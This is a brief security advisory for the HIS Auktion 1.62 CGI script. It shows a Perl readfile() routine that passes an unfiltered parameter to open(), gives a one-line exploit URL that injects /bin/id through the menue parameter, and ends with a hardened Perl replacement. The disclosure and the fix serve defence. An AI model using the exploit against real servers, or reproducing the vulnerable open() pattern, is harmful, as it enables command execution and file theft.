Name   : HIS Auktion 1.62: "show files" vulnerability.
About  : "HIS Auktion 1.62" is a CGI script that implements a
         catalog of links. Vendor site: http://www.his-software.de
Problem: -------from auktion.pl-------
         sub readfile {
         local($filename)=$_[0];
         local(@array);
         open(f,$filename);
         ----------------------------
         $filename is not filtered for special characters before
         it is passed to open().

Exploit:

lynx http://www.victim.com/cgi-bin/auktion.pl?menue=/bin/id
                                by: UkR-XblP (cuctema@ok.ru)
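
Mitigation sketch (an added example, not code from HIS Auktion or from the advisory author): a replacement for the readfile() pattern above that accepts only a bare file name, confines it to one directory and opens it read-only. The function name readfile_safe, the base-directory argument and the sample file main.html are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example: hardened form of the readfile() pattern quoted in the advisory.
use strict;
use warnings;
use Cwd qw(abs_path);
use File::Temp qw(tempdir);

# readfile_safe (hypothetical name): returns an array ref of lines, or undef
# if the requested name is not an allowed file inside $base.
sub readfile_safe {
    my ($base, $name) = @_;

    # Allowlist: a bare file name only. Slashes, dots-only names and any
    # other special characters are refused instead of being "cleaned up".
    return undef
        unless defined $name
        && $name =~ /\A([A-Za-z0-9_-]+(?:\.[A-Za-z0-9]+)?)\z/;
    my $clean = $1;

    # Resolve symlinks and confirm the result is still under the base directory.
    my $root = abs_path($base);
    return undef unless defined $root;
    my $path = abs_path("$root/$clean");
    return undef
        unless defined $path && index($path, "$root/") == 0 && -f $path;

    # Three-argument open with a lexical handle: the name is treated as a
    # literal path and the mode is fixed to read-only.
    open(my $fh, '<', $path) or return undef;
    my @lines = <$fh>;
    close($fh);
    return \@lines;
}

# Constructed sample data: one template file in a temporary directory.
my $dir = tempdir(CLEANUP => 1);
open(my $out, '>', "$dir/main.html") or die "setup failed: $!";
print {$out} "<h1>catalog</h1>\n";
close($out);

# 'main.html' is served; the value from the advisory and a relative
# path that leaves the directory are both rejected.
for my $req ('main.html', '/bin/id', '../main.html') {
    my $lines = readfile_safe($dir, $req);
    printf "%-14s %s\n", $req, $lines ? 'served' : 'rejected';
}
```

In the CGI script itself, the value of the menue parameter would be passed as the second argument and a rejected name answered with an error page.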